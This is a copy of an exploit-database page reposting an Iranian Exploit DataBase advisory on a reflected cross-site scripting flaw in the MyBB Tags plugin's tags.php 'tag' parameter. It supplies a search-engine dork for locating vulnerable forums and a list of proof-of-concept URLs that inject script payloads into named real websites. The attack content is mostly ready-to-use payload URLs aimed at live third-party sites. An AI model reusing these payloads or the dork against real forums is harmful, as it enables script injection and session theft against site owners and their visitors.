Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016040016

Below is a copy:

Mybb Tags Plugin Cross-Site Scripting Vulnerability#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# Mybb Tags Plugin Cross-Site Scripting Vulnerability

# Version Tag Plugin : 1.*

# Vulnerable: 1.6.* and 1.8.*

# Vendor site : https://mods.mybb.com/view/tag-system

# Dork : "MyBB,  2002-2016" + inurl:tags.php?tag=

# Author : IeDb.Ir

# Site : Www.IeDb.Ir   -   Www.IeDb.Ir/acc   -   xssed.Ir   -   kkli.ir

# Vulnerability attack information site : http://xssed.Ir/

#####################################

Bug :

http://www.site.com/mybb/tags.php?tag=[Xss]

Dem0 :

http://mybbskin.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forum.woc.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.lawwiki.ir/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.andysheh.com/talar/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://stertixforum.altervista.org/tags.php?tag=mybb"><script>alert(/IeDb.Ir/)</script>
http://bmw-diag.pl/tags.php?tag=ZUSB"><script>alert(/IeDb.Ir/)</script>
http://www.englishlearner.info/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forumszklarskaporeba.pl/tags.php?tag=T%C5%82usty%3Cinput%20onfocus=alert%281%29%20autofocus%3E

#####################################

#  Archive Exploit = http://iedb.ir/exploits-4982.html

#####################################

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.